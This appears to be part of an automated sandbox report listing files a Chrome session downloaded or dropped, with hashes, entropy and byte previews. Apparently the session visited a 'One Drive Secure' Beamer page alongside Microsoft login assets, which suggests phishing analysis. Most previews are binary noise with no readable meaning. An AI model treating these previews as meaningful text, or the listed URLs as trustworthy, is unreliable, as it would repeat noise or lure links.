                                                                                                                                                                                                                Preview:RIFF*...WEBPVP8L..../.E=..8r..`.l............<./>..=|....h.-.1...x.A;l..%........l9.h....b...*....V..y....A...I.,m{.(....m+.*..0.W..p:.#A(..1.[.. ...TPAur`)K..E/.n...=py...6..I..Z...F.p@.....$kt.s ..T...j.q..N...|D.....jX.;.a....En.6L.q... ..Y..x...=d..0k...X.W.~.....>.....@W.{d?b...?..@_....@GW.....`......~..)^.P....X.Xe..e..)...R..\.aY.AY.e...JX..u.........D..8..m..5.&.....qF...J..3.(T9P..(......y.qF*....D"UH...]\.k...y.#....8XK..Xc........JU0P.p...D..*...A....>..(..)d..,M.e.\....!.A.....nG..&:.4..J.Pij($,e..Y.r.BM....g.RJ.DJ.1.J.-r .G.......P.z...T]....1..k...;...#..$..$I...WG.U@w..#b....~..K..v....i....2.J..rB._....Z....2..$.<..d..$#. .D yc..Z..%..m..e....V..QB...d.....$I.."k.j.......m.2.....U..R...7'<.~$......&.u.YS.\...C.....H5kJ.......Q....I<}.C.M.j.u(-.nm..H....2...L......y..1$v.$Ah.I....?....5...m...Fz..}.Z{.........o..'.0....5...!"##....GMw.4.fsh.....2<.P..u@0j.[.L.H.hz.T.Z-.(..I(..A......h..`j...*+.t.6.6.M..E..eG..Ph...,Q.e...*
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):96
                                                                                                                                                                                                                Entropy (8bit):5.218997042938778
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:iuh72iczBra82yFsJFouMo+q6mgqWd6Nk:NciczBdTFsJFoM+q62Nk
                                                                                                                                                                                                                MD5:9872BE83FA60DA999B65A3BD481731D3
                                                                                                                                                                                                                SHA1:B59A8688C6A0D5311C6410A0D91537084E148F2D
                                                                                                                                                                                                                SHA-256:5DEE42A8D755847C0813D4E5F033F51197B20DD3C6C2EE4FBE31FD27B2F593D3
                                                                                                                                                                                                                SHA-512:53E947C87386ECF19E3B36E3F292A9757911F0F8B02FE36DDFC0DD74A3C784D97B15066AB4895EA694F66792A8C7CF525F59A03868FF5D5F0C3B5203D34C5F7D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmCAmly1gHbXRIFDdFbUVISBQ1Xevf9?alt=proto
                                                                                                                                                                                                                Preview:CkYKDQ3RW1FSGgQIVhgCIAEKNQ1Xevf9GgQISxgCKigIClIkChpAISMuKiQtXyslJj8vPV4pKCw6O348JyJcXRABGP////8P
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                Entropy (8bit):3.990210155325004
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                                                                                                                                                                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):621
                                                                                                                                                                                                                Entropy (8bit):7.673946009263606
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                                                                                                                                                                MD5:4761405717E938D7E7400BB15715DB1E
                                                                                                                                                                                                                SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                                                                                                                                                                SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                                                                                                                                                                SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                Entropy (8bit):4.227567157116928
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:mSnuZoSISHq/ZYn:mSnuZoSfq/ZYn
                                                                                                                                                                                                                MD5:9E37C8B2301A1BFE1ED0FDDC06F00175
                                                                                                                                                                                                                SHA1:D4DDED968BFF317586C3F9A1F2773FE9E15B8325
                                                                                                                                                                                                                SHA-256:CD893AFEEEA562055E66764EACB8F50E1FE4B8CF7D302A3A75269215EE285E19
                                                                                                                                                                                                                SHA-512:8C4AC320753F58EDA9620D12513EBCD02F7336B445D23E9419D7ACD65851D49E6DF85040DDF7B5645EC0AF48549884337A3F986C03CAB62DCF82BC19CD076609
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISHgnkXLn77c6BhhIFDZFhlU4SBQ0G7bv_EgUNkWGVTg==?alt=proto
                                                                                                                                                                                                                Preview:ChsKBw2RYZVOGgAKBw0G7bv/GgAKBw2RYZVOGgA=
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3620
                                                                                                                                                                                                                Entropy (8bit):6.867828878374734
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                                                                                                                                                                MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                                                                                                                                                SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                                                                                                                                                SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                                                                                                                                                                SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (25506)
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):25537
                                                                                                                                                                                                                Entropy (8bit):5.175776809715291
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:ICnffouNtwIXd3bmcRxo3kfZNUF/UF1xtjhUrAXJW2i28tvuJisJv4HROdyoL3H0:IC4uNtwI+AXJ0FoLVi
                                                                                                                                                                                                                MD5:093306BA4E497DC22C25795DC0D7B363
                                                                                                                                                                                                                SHA1:E3A3910A86571B9DF4F926061C5BAC2004DDF42C
                                                                                                                                                                                                                SHA-256:4DB512DA2F1FAC8207E52AB2FDD29AFA7A13F80DA0F3DD823B02D6CBD31695A4
                                                                                                                                                                                                                SHA-512:AF08BD4BFBE2E8202DF34B0334517FEAAC6EBEA761FB69AC21F7EF71A28F4804827D17F987943237E8721663B6FDD8129F2219BE1B926BEEB3D0D5260DAEA88E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:/* perfect-scrollbar v0.7.1 */.!function t(e,n,r){function o(i,s){if(!n[i]){if(!e[i]){var a="function"==typeof require&&require;if(!s&&a)return a(i,!0);if(l)return l(i,!0);var c=new Error("Cannot find module '"+i+"'");throw c.code="MODULE_NOT_FOUND",c}var u=n[i]={exports:{}};e[i][0].call(u.exports,function(t){var n=e[i][1][t];return o(n?n:t)},u,u.exports,t,e,n,r)}return n[i].exports}for(var l="function"==typeof require&&require,i=0;i<r.length;i++)o(r[i]);return o}({1:[function(t,e,n){"use strict";function r(t){t.fn.perfectScrollbar=function(t){return this.each(function(){if("object"==typeof t||"undefined"==typeof t){var e=t;l.get(this)||o.initialize(this,e)}else{var n=t;"update"===n?o.update(this):"destroy"===n&&o.destroy(this)}})}}var o=t("../main"),l=t("../plugin/instances");if("function"==typeof define&&define.amd)define(["jquery"],r);else{var i=window.jQuery?window.jQuery:window.$;"undefined"!=typeof i&&r(i)}e.exports=r},{"../main":7,"../plugin/instances":18}],2:[function(t,e,n){"u
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):35170
                                                                                                                                                                                                                Entropy (8bit):7.993096534744333
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                                                                                                                                                                                MD5:171A4DD9400708B88724B57D62B24A6A
                                                                                                                                                                                                                SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                                                                                                                                                                                SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                                                                                                                                                                                SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (555), with CRLF, LF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3795
                                                                                                                                                                                                                Entropy (8bit):5.202278168826609
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:mgR9yLehYhhhhh1YY7Y+QeezPQbWapQ999h/gPv69cCRrMTz4ICz3RW0PTyyUygO:VOPpa1V9i7WhbegXxC1pWLJH9sGPkI
                                                                                                                                                                                                                MD5:FF49065C1E737BCF76C13D5F57361598
                                                                                                                                                                                                                SHA1:5F3D7555823F54F3161C0C083F5508EF8A2836FD
                                                                                                                                                                                                                SHA-256:CCCA5DA0D3F54BDB9B77031C032F4AAD70E126BDEF2D5414C5E51486E461B436
                                                                                                                                                                                                                SHA-512:5765D6EC763AF6744C0F065216F20FA0D3249304CC0256F6DAB9402D0CBEDD58D9C8E8746277B1D0BC01D05830083E1B249D6717171B143834D8D121A849AD73
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:............<div role="listitem" data-description-id="95844714" data-post-title="Stillwell Hansen Thermal Parts " data-redirect-links="false" data-links-in-new-window="true" class="feature new january read hasShare" id="feature94328642">.........<div class="featureDate">..............................................................................................<div class="category categoryNew new">...............................New...................</div>......................................................<span>January 21, 2025</span>...........</div>.................<div class="featureControls">.............<div class="social featureControl" data-action="share">........<div class="socialShare" onclick="BeamerEmbed.showSocialMenu(this)" onkeypress="BeamerEmbed.showSocialMenu(this)" tabindex="0" role="button" title="Share" aria-label="Share ('Stillwell Hansen Thermal Parts ')"></div>........<div class="socialOverlay"></div>........<div class="socialList">.........<ul>..........<li
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):17174
                                                                                                                                                                                                                Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                                MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                                SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                                SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                                SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                                                                                                                                                                                Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (1169)
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):16702
                                                                                                                                                                                                                Entropy (8bit):5.4483067891965495
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:8JB+o67rtx9uUBt+gdE24RgJQyrTuuwOBIJQyrMA:WA74gTuuY
                                                                                                                                                                                                                MD5:73F318CF53208A3164E110C4F1BD225E
                                                                                                                                                                                                                SHA1:674B1D0BB2E67B1417B3EEB52302DB3C9CD9D94B
                                                                                                                                                                                                                SHA-256:438BA77716C5990AA6B5DBF27FAD33881EB7225EC10DA1E2165462D312325F85
                                                                                                                                                                                                                SHA-512:3A80874A85608D6847739E3728C2897DB7455DBF825F18FEC25A6E7B2506672E654CBEA1C44FE293FE48730CC8C3F6D0D762F30E8015E10645EB639C30A0F42D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://app.getbeamer.com/onedrivesecure/en
                                                                                                                                                                                                                Preview:..<!DOCTYPE html>.<html lang="en" data-powered-by="==== Powered by Beamer - www.getbeamer.com ====">.<head>. Metatags -->...<meta charset="utf-8">..<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">..<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="max-age=60, public">.<title>What's new on One Drive Secure | Beamer</title>.<meta name="description" content="One Drive Secure newsfeed and changelog.. Changelog and newsfeed.">.<meta name="keywords" content="What's, Drive, Secure, Beamer, changelog, newsfeed, feed, news, roadmap">.<meta name="referrer" content="always">.<meta lang='en'>..<meta http-equiv="content-type" content="text/html; charset=utf-8">.<meta http-equiv="content-language" content="en">.<meta name="viewport" content="width=device-width, initial-scale=1">.<link rel="canonical" href="https://app.getbeamer.com/onedrivesecure/en"> ..<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">.... Open Graph -->.<meta property="og:locale" content="en">.<meta
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 454821
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):122725
                                                                                                                                                                                                                Entropy (8bit):7.997347629519925
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:3072:aVYOI2atrRjlmfTIbRTQCjqYgXyIq40z3b335DfGZkbGft:JrFRxZQCqYgXytzIWGft
                                                                                                                                                                                                                MD5:9CDA699A84CA8729FAF194B8EFDDF6C0
                                                                                                                                                                                                                SHA1:804F83F5225243951178A1F785AF2B897B87ACA5
                                                                                                                                                                                                                SHA-256:A7C6A8173409765CFCAA6925CBF2CA7732ECC5B353FC8274746FA4BF4A1CABC4
                                                                                                                                                                                                                SHA-512:FA7A94976304C486A8A20C0672C8B4DEE5532099434B475B36C230498DB14DE99596B54AE95A2C9D2601EABCCDCDEE4DF5A1B21231F18E6EAD9AD453120588EB
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_n7VKwtWYm2mBLcIKAZfQlw2.js
                                                                                                                                                                                                                Preview:...........}[.8......\&.L.....M..f...@......V....../'d?...$..........mb..V*..J............2..]]W.'...WG.K............`.....~\..SV..#'f^%.*aT..7..a.$,.....w..q..*.....O.&qe......i.\.Bu.W.t..rzY.C..j.'~...p.....J.&..*N.QmS..bVY...*....P9..(..qR....'h$^@z....D....2.....^."..5.fx.1.C.|.*..@._...b....4....k].DZ..7.J.V^..}6.?.T.o......:.p.zn.1.....i%..B.....2..x.Z.DN.(....9..................^aq...l.sK.?.1.K2.T...Q.3.T....5..Y.Y.I2....&~....p.......C..G........?c^....\.F..Q8s.@.u.b.4..K...`_.....q|q.?]..<>l........R...........u_.....#.c..m.}{w....,.$....N....N..p..a..0y........@..1.].......m....v..E.P..h.....8..$@....]UFz.UV.mrgG.O.j.=..+{Zs..?N..jm%.h/W.c/.-.X..h........w..%.(...:.),...J.d/}+....Lk.Z..B..Q..YVO..wX....edi....e.#?.....".U.q-..J....h4..m....i}....[..+.z.E.<mC..]X.N..4.^.....*...,..j..;.).j...N..G....X7k..@L.L...h-.p..%R?.>e.......3.O_.....T$.C..~|)...U..!.k1=...)Y! )..;.Y.#%......{.K..?0.s_oo..%.S.i...kgr..XUC ...M.yJ.......
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 13976, version 1.0
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):13976
                                                                                                                                                                                                                Entropy (8bit):7.985218606951253
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:2+ZKdRae1oxCg5j/B04Vu56ft+7S8HWe0wDtHVelyuvCn6DkEWZmoFpYwSsHB2:bZKPt2j/B049ne001e46DVWZZwKh2
                                                                                                                                                                                                                MD5:E7E52C955AA33E618BAF437A16539524
                                                                                                                                                                                                                SHA1:13ECB55BB760D6980A1B1331085630EF5ED84E9F
                                                                                                                                                                                                                SHA-256:07C94892C3E0AC93D2BCB3A9CB88AA67EA47B3D1AA89BC39DFCC2B025DCD8988
                                                                                                                                                                                                                SHA-512:99465D864CF173B6C7DB67D6A9A44D9241D588564DA443DF0B7E1070E41D7D4E4CE75931FE5E54C5A483D06D68E8DCD181E12DA3BC555DE66B104A346FB1D9EB
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://app.getbeamer.com/fonts2/Lato-Normal-400b.woff2
                                                                                                                                                                                                                Preview:wOF2......6.......n...6B..........................z.p.`..D.....h.....B..6.$..v. .....E..^...q0.<d.H..q...Y#........:.X.......4U..J.y.[..^..._mT.2.&..=<.....m.X.`.....s.l....A....l.^..<.......g.....1C..(.)B.MJ..4g...!LPrl..1............mQ-...."...A.....F.[_..)..*M.C..!...h...,.#...#7&..K.....Hm..<.........Tm.....<!\....#.=.b..g..<..$.....n..K......+"-.{9...`.i.Vj.kJ..0T..^.......^.B(S.d.Q..:...4.7...h@.........b.u.V.{......|.O5z..$...ZS...'d.d.T....".'o..V.T.Xf....W.....L.........H.h.(STT...fV..o4w..d.$..#..........(.P..s...p../M.2]IX.(..|....Y"d..9..of.......HIa.....'..}.(}V.a}.z...Yf....F..0..Z...cj.....|v....'K...K.Q..R(.e.?.........z..l....X..9.C.h.M.H]...KC74.......}.^...|.......M..\.\I.m<my.O.10p$.0.;,..m.....5Y..b.<.d..}.T.5X.=)...q.......l.H..N.Z.....R..k.S..3...j./.p..B.(q..@y...$X(..Tt.Q..b.../A.$....$d...i..iZk..v.m?m....!c..,Y.e.3W.<...@.B..t.U..t.].b.K.,U:,<".L.r.+T...J..T.V.F.Z.......H.Y.V.L.o..=..\.<.../....BM....N.....
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 454821
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):122725
                                                                                                                                                                                                                Entropy (8bit):7.997347629519925
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:3072:aVYOI2atrRjlmfTIbRTQCjqYgXyIq40z3b335DfGZkbGft:JrFRxZQCqYgXytzIWGft
                                                                                                                                                                                                                MD5:9CDA699A84CA8729FAF194B8EFDDF6C0
                                                                                                                                                                                                                SHA1:804F83F5225243951178A1F785AF2B897B87ACA5
                                                                                                                                                                                                                SHA-256:A7C6A8173409765CFCAA6925CBF2CA7732ECC5B353FC8274746FA4BF4A1CABC4
                                                                                                                                                                                                                SHA-512:FA7A94976304C486A8A20C0672C8B4DEE5532099434B475B36C230498DB14DE99596B54AE95A2C9D2601EABCCDCDEE4DF5A1B21231F18E6EAD9AD453120588EB
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:...........}[.8......\&.L.....M..f...@......V....../'d?...$..........mb..V*..J............2..]]W.'...WG.K............`.....~\..SV..#'f^%.*aT..7..a.$,.....w..q..*.....O.&qe......i.\.Bu.W.t..rzY.C..j.'~...p.....J.&..*N.QmS..bVY...*....P9..(..qR....'h$^@z....D....2.....^."..5.fx.1.C.|.*..@._...b....4....k].DZ..7.J.V^..}6.?.T.o......:.p.zn.1.....i%..B.....2..x.Z.DN.(....9..................^aq...l.sK.?.1.K2.T...Q.3.T....5..Y.Y.I2....&~....p.......C..G........?c^....\.F..Q8s.@.u.b.4..K...`_.....q|q.?]..<>l........R...........u_.....#.c..m.}{w....,.$....N....N..p..a..0y........@..1.].......m....v..E.P..h.....8..$@....]UFz.UV.mrgG.O.j.=..+{Zs..?N..jm%.h/W.c/.-.X..h........w..%.(...:.),...J.d/}+....Lk.Z..B..Q..YVO..wX....edi....e.#?.....".U.q-..J....h4..m....i}....[..+.z.E.<mC..]X.N..4.^.....*...,..j..;.).j...N..G....X7k..@L.L...h-.p..%R?.>e.......3.O_.....T$.C..~|)...U..!.k1=...)Y! )..;.Y.#%......{.K..?0.s_oo..%.S.i...kgr..XUC ...M.yJ.......
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):673
                                                                                                                                                                                                                Entropy (8bit):7.6596900876595075
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                                                                                                                                                MD5:0E176276362B94279A4492511BFCBD98
                                                                                                                                                                                                                SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                                                                                                                                                SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                                                                                                                                                SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
